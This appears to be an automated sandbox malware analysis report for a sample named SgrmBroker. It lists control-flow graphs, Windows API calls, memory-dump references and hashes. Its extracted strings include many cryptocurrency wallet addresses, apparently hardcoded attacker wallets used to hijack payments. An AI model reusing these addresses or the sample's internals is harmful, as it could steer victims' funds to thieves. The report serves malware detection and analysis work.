call 7ff6d9cf6fa0 call 7ff6d9dbf4b0 3952->3961 3953->3960 3953->3961 3958->3935 3958->3936 3968 7ff6d9cfb6e4-7ff6d9cfb7d6 call 7ff6d9cf6640 call 7ff6d9dbf4b0 call 7ff6d9dc98f0 3960->3968 3969 7ff6d9cfbf2c-7ff6d9cfbf31 call 7ff6d9dc98f0 3960->3969 3961->3968 3961->3969 3968->3932 3991->3910 3999 7ff6d9cf81bc-7ff6d9cf8248 call 7ff6d9cf79f0 call 7ff6d9cf67f0 call 7ff6d9dc9960 3991->3999 3999->3910 4006 7ff6d9cf824e-7ff6d9cf8305 call 7ff6d9cf79f0 call 7ff6d9cf60c0 call 7ff6d9dc9960 3999->4006 4006->3910 4013 7ff6d9cf830b-7ff6d9cf83c2 call 7ff6d9cf79f0 call 7ff6d9cf6240 call 7ff6d9dc9960 4006->4013 4013->3910 4020 7ff6d9cf83c8-7ff6d9cf847f call 7ff6d9cf79f0 call 7ff6d9cf6e70 call 7ff6d9dc9960 4013->4020 4020->3910 4027 7ff6d9cf8485-7ff6d9cf853c call 7ff6d9cf79f0 call 7ff6d9cf6850 call 7ff6d9dc9960 4020->4027 4027->3910 4034 7ff6d9cf8542-7ff6d9cf85f9 call 7ff6d9cf79f0 call 7ff6d9cf6b70 call 7ff6d9dc9960 4027->4034 4034->3910 4041 7ff6d9cf85ff-7ff6d9cf86b1 call 7ff6d9cf79f0 call 7ff6d9cf67c0 call 7ff6d9dc9960 4034->4041 4041->3910 4048 7ff6d9cf86b7-7ff6d9cf8743 call 7ff6d9cf79f0 call 7ff6d9cf68e0 call 7ff6d9dc9960 4041->4048 4048->3910 4055 7ff6d9cf8749-7ff6d9cf8800 call 7ff6d9cf79f0 call 7ff6d9cf6730 call 7ff6d9dc9960 4048->4055 4055->3910 4062 7ff6d9cf8806-7ff6d9cf88bd call 7ff6d9cf79f0 call 7ff6d9cf6950 call 7ff6d9dc9960 4055->4062 4062->3910 4069 7ff6d9cf88c3-7ff6d9cf8956 call 7ff6d9cf79f0 4062->4069 4072 7ff6d9cf895c-7ff6d9cf8963 4069->4072 4073 7ff6d9cf8a3b-7ff6d9cf8a8b 4069->4073 4072->4073 4074 7ff6d9cf8969-7ff6d9cf8970 4072->4074 4075 7ff6d9cf8a08-7ff6d9cf8a23 4074->4075 4076 7ff6d9cf8976-7ff6d9cf8990 4074->4076 4075->4073 4078 7ff6d9cf8a25-7ff6d9cf8a35 HeapFree 4075->4078 4077 7ff6d9cf89ac-7ff6d9cf89af 4076->4077 4079 7ff6d9cf89b1-7ff6d9cf89bf 4077->4079 4080 7ff6d9cf89df-7ff6d9cf89f0 4077->4080 4078->4073 4081 7ff6d9cf89c0-7ff6d9cf89db 4079->4081 4082 7ff6d9cf89f2-7ff6d9cf8a06 HeapFree 4080->4082 4083 7ff6d9cf89a0-7ff6d9cf89aa 4080->4083 4081->4081 4084 7ff6d9cf89dd 4081->4084 4082->4083 4083->4075 4083->4077 4084->4080
                                                                                      APIs
                                                                                      Strings
                                                                                      • bnb1wgg754yum45k3xdujqux70grjamchd0r835qx30xbfc5eC42b076474556956170b0FEE67c44085A02bc1qra7aw9jlr4xvlh70aak2fgu9jfnjjal684ak8nDU53q9RcY38fQR6ucJ8UfRQezP5HWb1YorLNk3xaBohZWogkoVGW5W7c9ZrPVgrHpoJmXs9vVEZJjqf2u9jpyrYqwEJ5eqVKyYJWQSrNGLYRou7kXMBJydjJREVNgiskxGCM17, xrefs: 00007FF6D9CF7E8A
                                                                                      • addr1qx0uvzkwcadg2fxtsjmf2gycwmm9euk07tp6xrucnvgjmp5lcc9va366s5jvhp9kj5sfsahktnevlukr5v8e3xc39krqkkzrmkUQA8QuqPYcdTBkQ31TFvM8XajaQc3R_C-5JFD_hrWlPm4hD1AWDLScUnSMFytQa25skvZetXDLWCH7N6Ef0xfFB8E61AF3e168EDF84BB3C020d43bCEb5A23D33t1bJ6AkfYVwT39PyvKLw6erNqqgxg6Yub, xrefs: 00007FF6D9CF8355
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Free$Process
                                                                                      • String ID: addr1qx0uvzkwcadg2fxtsjmf2gycwmm9euk07tp6xrucnvgjmp5lcc9va366s5jvhp9kj5sfsahktnevlukr5v8e3xc39krqkkzrmkUQA8QuqPYcdTBkQ31TFvM8XajaQc3R_C-5JFD_hrWlPm4hD1AWDLScUnSMFytQa25skvZetXDLWCH7N6Ef0xfFB8E61AF3e168EDF84BB3C020d43bCEb5A23D33t1bJ6AkfYVwT39PyvKLw6erNqqgxg6Yub$bnb1wgg754yum45k3xdujqux70grjamchd0r835qx30xbfc5eC42b076474556956170b0FEE67c44085A02bc1qra7aw9jlr4xvlh70aak2fgu9jfnjjal684ak8nDU53q9RcY38fQR6ucJ8UfRQezP5HWb1YorLNk3xaBohZWogkoVGW5W7c9ZrPVgrHpoJmXs9vVEZJjqf2u9jpyrYqwEJ5eqVKyYJWQSrNGLYRou7kXMBJydjJREVNgiskxGCM17
                                                                                      • API String ID: 2719409998-3231638534
                                                                                      • Opcode ID: 2590335adbe2db1ce14068069ad4a343ce949a76aa3686c4218140aa74e4d27e
                                                                                      • Instruction ID: 9e6a701b008196aa38edbe3aef54c89f217ef75b5b80aad09e66bb7ae3ba446a
                                                                                      • Opcode Fuzzy Hash: 2590335adbe2db1ce14068069ad4a343ce949a76aa3686c4218140aa74e4d27e
                                                                                      • Instruction Fuzzy Hash: FF72C432609B5181E7649F15E4903AE7BB5EBC83A4F444236EACD83BA9DF3CC255CB50
                                                                                      Function 00007FF6D9DD08F0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4085 7ff6d9dd08f0-7ff6d9dd0903 4086 7ff6d9dd0905-7ff6d9dd0913 4085->4086 4087 7ff6d9dd0920-7ff6d9dd0922 4085->4087 4088 7ff6d9dd0915-7ff6d9dd091b 4086->4088 4089 7ff6d9dd0927-7ff6d9dd0936 4086->4089 4090 7ff6d9dd0b9f-7ff6d9dd0bb2 4087->4090 4091 7ff6d9dd09b0-7ff6d9dd09ec 4088->4091 4092 7ff6d9dd096e-7ff6d9dd097c 4089->4092 4093 7ff6d9dd0938-7ff6d9dd0947 4089->4093 4094 7ff6d9dd09f2-7ff6d9dd0a07 call 7ff6d9dc9960 4091->4094 4095 7ff6d9dd0bc5-7ff6d9dd0bc7 4091->4095 4092->4091 4096 7ff6d9dd097e-7ff6d9dd098f 4093->4096 4097 7ff6d9dd0949-7ff6d9dd0967 4093->4097 4094->4095 4102 7ff6d9dd0a0d-7ff6d9dd0a2d 4094->4102 4099 7ff6d9dd0991-7ff6d9dd09ae 4096->4099 4100 7ff6d9dd0969-7ff6d9dd096c 4096->4100 4097->4099 4097->4100 4099->4091 4100->4091 4103 7ff6d9dd0a40-7ff6d9dd0a44 4102->4103 4104 7ff6d9dd0ad0-7ff6d9dd0ad7 4103->4104 4105 7ff6d9dd0a4a-7ff6d9dd0a4d 4103->4105 4106 7ff6d9dd0a30-7ff6d9dd0a3d 4104->4106 4107 7ff6d9dd0add-7ff6d9dd0b05 call 7ff6d9de8850 4104->4107 4108 7ff6d9dd0a53-7ff6d9dd0a5a 4105->4108 4109 7ff6d9dd0b50-7ff6d9dd0b5d 4105->4109 4106->4103 4107->4106 4113 7ff6d9dd0a6a-7ff6d9dd0a7d 4108->4113 4114 7ff6d9dd0a5c-7ff6d9dd0a66 4108->4114 4111 7ff6d9dd0bb3-7ff6d9dd0bb8 4109->4111 4112 7ff6d9dd0b5f-7ff6d9dd0b66 4109->4112 4120 7ff6d9dd0bba 4111->4120 4121 7ff6d9dd0b8d-7ff6d9dd0b99 HeapFree 4111->4121 4112->4095 4116 7ff6d9dd0b68-7ff6d9dd0b76 SysAllocStringLen 4112->4116 4118 7ff6d9dd0a7f-7ff6d9dd0a91 4113->4118 4119 7ff6d9dd0aba-7ff6d9dd0ac7 4113->4119 4114->4106 4117 7ff6d9dd0a68 4114->4117 4116->4095 4122 7ff6d9dd0b78-7ff6d9dd0b86 SysStringLen 4116->4122 4117->4107 4123 7ff6d9dd0a93-7ff6d9dd0ab6 4118->4123 4124 7ff6d9dd0b0a-7ff6d9dd0b1d 4118->4124 4119->4104 4120->4090 4121->4090 4126 7ff6d9dd0bbc-7ff6d9dd0bbf SysFreeString 4122->4126 4127 7ff6d9dd0b88-7ff6d9dd0b8b 4122->4127 4123->4104 4128 7ff6d9dd0ab8 4123->4128 4124->4104 4125 7ff6d9dd0b1f-7ff6d9dd0b48 4124->4125 4125->4106 4129 7ff6d9dd0b4e 4125->4129 4126->4095 4127->4090 4127->4121 4128->4125 4129->4107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5f6c62ab2db21098160880d27bb8cad0d1082af47fb6b289407d2f1f7a8c4d3a
                                                                                      • Instruction ID: c4c157599256169a3a72078c36042f43e23d30a6a7c29809c0f646ba4d1162ca
                                                                                      • Opcode Fuzzy Hash: 5f6c62ab2db21098160880d27bb8cad0d1082af47fb6b289407d2f1f7a8c4d3a
                                                                                      • Instruction Fuzzy Hash: 57712222F1CF5645FB684E21D95023E6A91BFC4798F085336DA6E867D4DE7CE0609B00
                                                                                      Function 00007FF6D9CF8A90 Relevance: 1.6, APIs: 1, Instructions: 391memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF6D9DD0E00: CoInitializeEx.COMBASE(?,?,?,?,?,?,?,?,?,?,00007FF6D9CF8ACC), ref: 00007FF6D9DD0E0D
                                                                                        • Part of subcall function 00007FF6D9DD0E00: CoInitializeSecurity.COMBASE ref: 00007FF6D9DD0E4E
                                                                                        • Part of subcall function 00007FF6D9DD0E00: GetErrorInfo.OLEAUT32 ref: 00007FF6D9DD0E6A
                                                                                      • HeapFree.KERNEL32 ref: 00007FF6D9CFB576
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize$ErrorFreeHeapInfoSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 3052856675-0
                                                                                      • Opcode ID: 0f48b1aa49b6190a7b16018d7c58fe59604f862a2086cf6f194656bd0caab654
                                                                                      • Instruction ID: ecfdaa87f9886f7e8d7aa4b1dca3961e99565eed0827b14269e0759acb9d7a4c
                                                                                      • Opcode Fuzzy Hash: 0f48b1aa49b6190a7b16018d7c58fe59604f862a2086cf6f194656bd0caab654
                                                                                      • Instruction Fuzzy Hash: BE32B136609BC494D671CB15F4813DAB7A8F799784F508226DACC83B69DFBCD1A4CB40
                                                                                      Function 00007FF6D9D4AF80 Relevance: 1.5, APIs: 1, Instructions: 244memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 5b0d1d7fd54f2b927ec463458e338d930c35b5a77488b728646247ff87a8c530
                                                                                      • Instruction ID: dba7660b1704b2d10da359130db7e2d2a40a5569f35b14e0e0c71ac55b5e9d19
                                                                                      • Opcode Fuzzy Hash: 5b0d1d7fd54f2b927ec463458e338d930c35b5a77488b728646247ff87a8c530
                                                                                      • Instruction Fuzzy Hash: 1B919F23A09A8582E7558F16E54037DB7A0F798BA4F448232EF9D43795DF3CE9A1CB00
                                                                                      Function 00007FF6D9CF1DED Relevance: 15.2, APIs: 10, Instructions: 193COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3141 7ff6d9cf1ded-7ff6d9cf1e5a VariantToPropVariant 3142 7ff6d9cf1f53-7ff6d9cf1f87 GetErrorInfo PropVariantClear 3141->3142 3143 7ff6d9cf1e60-7ff6d9cf1ec3 PropVariantToBSTR 3141->3143 3144 7ff6d9cf1ff5-7ff6d9cf2016 3142->3144 3145 7ff6d9cf1fbc-7ff6d9cf1fdc GetErrorInfo 3143->3145 3146 7ff6d9cf1ec9-7ff6d9cf1ece 3143->3146 3149 7ff6d9cf2021-7ff6d9cf209a call 7ff6d9d2e0c0 3144->3149 3150 7ff6d9cf2018-7ff6d9cf201b 3144->3150 3147 7ff6d9cf1fe7-7ff6d9cf1fef PropVariantClear 3145->3147 3148 7ff6d9cf1fde-7ff6d9cf1fe1 SysFreeString 3145->3148 3146->3147 3147->3144 3148->3147 3153 7ff6d9cf20a2-7ff6d9cf20a5 3149->3153 3154 7ff6d9cf209c SysFreeString 3149->3154 3150->3149 3155 7ff6d9cf17dd-7ff6d9cf1802 GetErrorInfo 3153->3155 3156 7ff6d9cf20ab-7ff6d9cf20d2 3153->3156 3154->3153 3159 7ff6d9cf1804-7ff6d9cf180a 3155->3159 3160 7ff6d9cf180c-7ff6d9cf26e0 3155->3160 3158 7ff6d9cf20e0-7ff6d9cf20e8 3156->3158 3161 7ff6d9cf20f0-7ff6d9cf21b9 call 7ff6d9dd2010 3158->3161 3159->3160 3176 7ff6d9cf26e3-7ff6d9cf26f7 3160->3176 3167 7ff6d9cf21bf 3161->3167 3168 7ff6d9cf224d-7ff6d9cf225e VariantClear 3161->3168 3169 7ff6d9cf21c3-7ff6d9cf21d4 VariantClear 3167->3169 3170 7ff6d9cf2260-7ff6d9cf2264 3168->3170 3171 7ff6d9cf229c-7ff6d9cf22a4 3168->3171 3173 7ff6d9cf21da-7ff6d9cf21de 3169->3173 3174 7ff6d9cf255b-7ff6d9cf256d 3169->3174 3170->3171 3175 7ff6d9cf2266-7ff6d9cf2282 3170->3175 3177 7ff6d9cf22ac-7ff6d9cf2310 call 7ff6d9cf7210 3171->3177 3173->3174 3178 7ff6d9cf21e4-7ff6d9cf2200 3173->3178 3183 7ff6d9cf2571-7ff6d9cf25c2 3174->3183 3179 7ff6d9cf2288-7ff6d9cf228e 3175->3179 3180 7ff6d9cf2529-7ff6d9cf252b 3175->3180 3181 7ff6d9cf26ff-7ff6d9cf2734 3176->3181 3194 7ff6d9cf2759-7ff6d9cf2784 3177->3194 3195 7ff6d9cf2316-7ff6d9cf2379 call 7ff6d9cf4b50 3177->3195 3184 7ff6d9cf2202-7ff6d9cf2208 3178->3184 3185 7ff6d9cf2210-7ff6d9cf2215 3178->3185 3179->3155 3186 7ff6d9cf2294-7ff6d9cf2296 3179->3186 3180->3171 3187 7ff6d9cf2531-7ff6d9cf2537 3180->3187 3189 7ff6d9cf25c4-7ff6d9cf25d5 HeapFree 3183->3189 3190 7ff6d9cf25db-7ff6d9cf25ee call 7ff6d9cf3d90 3183->3190 3184->3185 3192 7ff6d9cf220a 3184->3192 3185->3174 3193 7ff6d9cf221b-7ff6d9cf2246 GetProcessHeap HeapFree 3185->3193 3186->3171 3186->3187 3187->3193 3189->3190 3201 7ff6d9cf25f4-7ff6d9cf2604 3190->3201 3202 7ff6d9cf27d0-7ff6d9cf27d9 3190->3202 3192->3155 3193->3177 3199 7ff6d9cf2248 3193->3199 3194->3189 3198 7ff6d9cf278a 3194->3198 3203 7ff6d9cf250f-7ff6d9cf251f call 7ff6d9ddef40 3195->3203 3204 7ff6d9cf237f-7ff6d9cf23b3 3195->3204 3198->3190 3199->3183 3205 7ff6d9cf2622-7ff6d9cf2627 3201->3205 3206 7ff6d9cf27ef-7ff6d9cf27fc 3202->3206 3207 7ff6d9cf27db-7ff6d9cf27e9 HeapFree 3202->3207 3214 7ff6d9cf2524 3203->3214 3208 7ff6d9cf23b6-7ff6d9cf23cf 3204->3208 3210 7ff6d9cf2610-7ff6d9cf261c 3205->3210 3211 7ff6d9cf2629-7ff6d9cf2638 HeapFree 3205->3211 3218 7ff6d9cf27fe-7ff6d9cf2825 3206->3218 3219 7ff6d9cf282a-7ff6d9cf283a 3206->3219 3207->3206 3212 7ff6d9cf23d1-7ff6d9cf23db 3208->3212 3213 7ff6d9cf242a-7ff6d9cf2440 3208->3213 3210->3202 3210->3205 3211->3210 3216 7ff6d9cf23fd-7ff6d9cf2409 3212->3216 3217 7ff6d9cf23dd-7ff6d9cf23f5 3212->3217 3220 7ff6d9cf2442-7ff6d9cf245b call 7ff6d9dd4ee0 3213->3220 3221 7ff6d9cf2420-7ff6d9cf2428 3213->3221 3214->3180 3222 7ff6d9cf240f-7ff6d9cf241a 3216->3222 3223 7ff6d9cf24e6-7ff6d9cf24f4 3216->3223 3217->3216 3218->3181 3219->3176 3220->3221 3229 7ff6d9cf245d-7ff6d9cf249b 3220->3229 3221->3212 3221->3213 3222->3208 3225 7ff6d9cf199e-7ff6d9cf1a28 3223->3225 3226 7ff6d9cf24fa-7ff6d9cf250a 3223->3226 3228 7ff6d9cf1a30-7ff6d9cf1a38 3225->3228 3226->3225 3230 7ff6d9cf1a3e-7ff6d9cf1a49 3228->3230 3231 7ff6d9cf278f-7ff6d9cf27ca 3228->3231 3232 7ff6d9cf24b4-7ff6d9cf24d1 3229->3232 3233 7ff6d9cf249d-7ff6d9cf24ae HeapFree 3229->3233 3230->3155 3235 7ff6d9cf1a4f-7ff6d9cf1a5b 3230->3235 3231->3201 3231->3202 3232->3228 3234 7ff6d9cf24d7-7ff6d9cf24e1 call 7ff6d9cf3f10 3232->3234 3233->3232 3234->3228 3237 7ff6d9cf1a80 3235->3237 3238 7ff6d9cf1a5d-7ff6d9cf1a71 call 7ff6d9dc9960 3235->3238 3241 7ff6d9cf1a85-7ff6d9cf1aa2 call 7ff6d9dd4fe0 3237->3241 3238->3241 3244 7ff6d9cf1a73 3238->3244 3246 7ff6d9cf1c30-7ff6d9cf1c52 3241->3246 3247 7ff6d9cf1aa8-7ff6d9cf1aaf 3241->3247 3244->3155 3249 7ff6d9cf1c59-7ff6d9cf1c86 3246->3249 3247->3155 3248 7ff6d9cf1ab5-7ff6d9cf1ad8 GetProcessHeap HeapAlloc 3247->3248 3248->3155 3250 7ff6d9cf1ade-7ff6d9cf1b09 3248->3250 3253 7ff6d9cf1cd0-7ff6d9cf1cf3 GetErrorInfo 3249->3253 3254 7ff6d9cf1c88-7ff6d9cf1c96 3249->3254 3251 7ff6d9cf1b34-7ff6d9cf1b37 3250->3251 3255 7ff6d9cf1b39-7ff6d9cf1b3c 3251->3255 3256 7ff6d9cf1b16 3251->3256 3253->3169 3262 7ff6d9cf1cf9-7ff6d9cf1d01 3253->3262 3258 7ff6d9cf1d10-7ff6d9cf1d34 call 7ff6d9dd10b0 3254->3258 3259 7ff6d9cf1c98-7ff6d9cf1c9e 3254->3259 3260 7ff6d9cf1b42-7ff6d9cf1b49 3255->3260 3261 7ff6d9cf1bf0-7ff6d9cf1c1f 3255->3261 3257 7ff6d9cf1b19-7ff6d9cf1b31 3256->3257 3257->3251 3273 7ff6d9cf1d9a-7ff6d9cf1db1 3258->3273 3274 7ff6d9cf1d36-7ff6d9cf1d52 3258->3274 3263 7ff6d9cf1ca4-7ff6d9cf1cbb 3259->3263 3264 7ff6d9cf1f45-7ff6d9cf1fb7 3259->3264 3265 7ff6d9cf1b10-7ff6d9cf1b13 3260->3265 3266 7ff6d9cf1b4b-7ff6d9cf1b5e 3260->3266 3261->3249 3262->3169 3263->3253 3264->3158 3275 7ff6d9cf1d5a-7ff6d9cf1d95 3264->3275 3265->3256 3269 7ff6d9cf1b60-7ff6d9cf1b74 3266->3269 3270 7ff6d9cf1ba1-7ff6d9cf1bab 3266->3270 3276 7ff6d9cf1bb0-7ff6d9cf1bc0 3269->3276 3277 7ff6d9cf1b76-7ff6d9cf1b99 3269->3277 3270->3256 3273->3161 3274->3275 3275->3167 3276->3256 3279 7ff6d9cf1bc6-7ff6d9cf1bea 3276->3279 3277->3256 3278 7ff6d9cf1b9f 3277->3278 3278->3279 3279->3257
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Prop$ClearErrorInfo$FreeString
                                                                                      • String ID:
                                                                                      • API String ID: 570662331-0
                                                                                      • Opcode ID: a549cc1ded32417bf6302d8e63c0067434f630680e4ea3ea17c2ecf6f807ee73
                                                                                      • Instruction ID: 82890b819c60196140dc6517257d723f886c50820e65cad2bf93c7aa608a08ab
                                                                                      • Opcode Fuzzy Hash: a549cc1ded32417bf6302d8e63c0067434f630680e4ea3ea17c2ecf6f807ee73
                                                                                      • Instruction Fuzzy Hash: B2A1F732609BC586E7718F55E4943EEB3B4FB84754F408226DAC983AA8DF7CD159CB40
                                                                                      Function 00007FF6D9CF28B0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 236memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3280 7ff6d9cf28b0-7ff6d9cf2927 call 7ff6d9dd08f0 * 2 3286 7ff6d9cf2a6d-7ff6d9cf2a96 GetErrorInfo 3280->3286 3287 7ff6d9cf292d-7ff6d9cf2935 3280->3287 3290 7ff6d9cf2a9e-7ff6d9cf2aa1 3286->3290 3291 7ff6d9cf2a98 3286->3291 3288 7ff6d9cf2b2a-7ff6d9cf2b2f 3287->3288 3289 7ff6d9cf293b-7ff6d9cf293e 3287->3289 3292 7ff6d9cf2aa3-7ff6d9cf2aa6 SysFreeString 3288->3292 3296 7ff6d9cf2b35 3288->3296 3294 7ff6d9cf2940-7ff6d9cf2943 SysFreeString 3289->3294 3295 7ff6d9cf2949-7ff6d9cf294c 3289->3295 3290->3292 3293 7ff6d9cf2aac-7ff6d9cf2aaf 3290->3293 3291->3290 3292->3293 3297 7ff6d9cf2ab1-7ff6d9cf2ab4 SysFreeString 3293->3297 3298 7ff6d9cf2aba-7ff6d9cf2ac0 3293->3298 3294->3295 3299 7ff6d9cf294e-7ff6d9cf2951 SysFreeString 3295->3299 3300 7ff6d9cf2957-7ff6d9cf2974 call 7ff6d9cf1000 3295->3300 3296->3293 3297->3298 3301 7ff6d9cf2b76-7ff6d9cf2b89 3298->3301 3299->3300 3304 7ff6d9cf2b3a-7ff6d9cf2b48 3300->3304 3305 7ff6d9cf297a-7ff6d9cf2990 call 7ff6d9dc9960 3300->3305 3309 7ff6d9cf2b65-7ff6d9cf2b73 3304->3309 3310 7ff6d9cf2b4a-7ff6d9cf2b51 3304->3310 3311 7ff6d9cf2b8a-7ff6d9cf2bd2 3305->3311 3312 7ff6d9cf2996-7ff6d9cf29ea 3305->3312 3309->3301 3313 7ff6d9cf2b54-7ff6d9cf2b63 3310->3313 3318 7ff6d9cf2bd4-7ff6d9cf2be9 3311->3318 3319 7ff6d9cf2c40-7ff6d9cf2c46 3311->3319 3314 7ff6d9cf2a22-7ff6d9cf2a2b call 7ff6d9cf1000 3312->3314 3313->3301 3317 7ff6d9cf2a30-7ff6d9cf2a39 3314->3317 3322 7ff6d9cf2ac5-7ff6d9cf2ad8 3317->3322 3323 7ff6d9cf2a3f-7ff6d9cf2a44 3317->3323 3324 7ff6d9cf2bf0-7ff6d9cf2c0b call 7ff6d9d2f0e0 3318->3324 3320 7ff6d9cf2c48 3319->3320 3321 7ff6d9cf2c16-7ff6d9cf2c2a 3319->3321 3325 7ff6d9cf2c33-7ff6d9cf2c3f 3320->3325 3321->3325 3322->3313 3332 7ff6d9cf2ada-7ff6d9cf2aee 3322->3332 3326 7ff6d9cf29f0-7ff6d9cf2a1e 3323->3326 3327 7ff6d9cf2a46-7ff6d9cf2a6b call 7ff6d9de6040 3323->3327 3334 7ff6d9cf2c0d-7ff6d9cf2c14 3324->3334 3326->3314 3327->3326 3335 7ff6d9cf2af0-7ff6d9cf2af3 3332->3335 3336 7ff6d9cf2b11-7ff6d9cf2b14 3332->3336 3334->3321 3334->3325 3337 7ff6d9cf2b00-7ff6d9cf2b0f call 7ff6d9cf3d90 3335->3337 3336->3301 3338 7ff6d9cf2b16-7ff6d9cf2b28 HeapFree 3336->3338 3337->3336 3338->3301
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$String$ErrorHeapInfo
